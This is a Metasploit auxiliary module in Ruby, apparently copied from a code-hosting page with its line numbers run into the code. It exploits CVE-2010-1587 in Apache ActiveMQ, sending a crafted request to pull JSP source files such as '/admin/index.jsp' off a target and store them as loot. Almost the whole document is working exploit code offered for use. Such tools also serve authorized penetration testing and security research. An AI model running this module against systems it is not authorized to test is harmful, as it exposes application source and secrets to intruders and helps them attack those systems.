Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Report8include Msf::Auxiliary::Scanner910def initialize(info = {})11super(update_info(info,12'Name' => 'Apache ActiveMQ JSP Files Source Disclosure',13'Description' => %q{14This module exploits a source code disclosure in Apache ActiveMQ. The15vulnerability is due to the Jetty's ResourceHandler handling of specially crafted16URI's starting with //. It has been tested successfully on Apache ActiveMQ 5.3.117over Windows 2003 SP2 and Ubuntu 10.04.18},19'License' => MSF_LICENSE,20'Author' =>21[22'Veerendra G.G', # Vulnerability discovery23'juan vazquez' # Metasploit module24],25'References' =>26[27[ 'CVE', '2010-1587' ],28[ 'OSVDB', '64020' ],29[ 'BID', '39636' ],30[ 'URL', 'https://issues.apache.org/jira/browse/AMQ-2700' ]31]32))3334register_options(35[36Opt::RPORT(8161),37OptString.new('TARGETURI', [true, 'Path to the JSP file to disclose source code', '/admin/index.jsp'])38])39end4041def run_host(ip)4243print_status("#{rhost}:#{rport} - Sending request...")44uri = normalize_uri(target_uri.path)45res = send_request_cgi({46'uri' => uri,47'method' => 'GET',48})4950if res and res.code == 20051contents = res.body52fname = File.basename(datastore['TARGETURI'])53path = store_loot(54'apache.activemq',55'text/plain',56ip,57contents,58fname59)60print_status("#{rhost}:#{rport} - File saved in: #{path}")61else62print_error("#{rhost}:#{rport} - Failed to retrieve file")63return64end65end66end676869